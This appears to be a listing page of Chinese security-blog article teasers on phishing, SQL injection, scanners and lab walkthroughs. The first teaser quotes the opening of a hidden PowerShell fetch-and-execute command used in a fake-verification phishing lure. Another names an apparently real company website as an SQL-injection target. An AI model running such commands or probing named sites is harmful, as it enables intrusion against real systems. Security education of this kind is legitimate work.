女神电脑沦陷记通过邮件发送钓鱼信息访问提示连接不安全跳转验证机器人操作诱导你完成复制粘贴powershell.exe -w hidden -Command "iex (iwr '[https://]2...
记一次实战案例
1、目标:inurl:news.php?id= URL:https://www.lghk.com/news.php?id=5 网站标题:趋时珠宝首饰有限公司手工基础判断:And用法and 1=1: ...
实战 | 目录扫描器开发-泄露漏洞
起因有时候目录扫描,我们会顺便扫描是否存在备份的情况,这时候就自己简单的写了一个python的脚本主要想做到的是 例如我扫 http://xxx.cn 的站点目标的时候会根据域名自...
实战 | 目录扫描器开发
获网安教程免费&进群本文由掌控安全学院 - 杳若 投稿起因有时候目录扫描,我们会顺便扫描是否存在备份的情况,这时候就自己简单的写了一个python的脚本主要想做到...
sqli-labs less9详解(附py脚本)
分析题目从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。需要知道的函数1、sleep(5):延...
网络安全Vulnhub:secure code靶场(代码审计,编写一键RCE脚本)
00:前言这次给大家带来的是Vulnhub secure code靶机。这个靶机是偏向于代码审计的,也可以顺便练习下编写脚本达到一键RCE化。下载链接: http://www.vulnhub.com/...
靶机实战-密码重置与身份认证失效漏洞
密码重置漏洞 一般的密码重置的设计都是分为以下四步的:1.输入账户名2.验证身份3.重置密码4.完成 通常...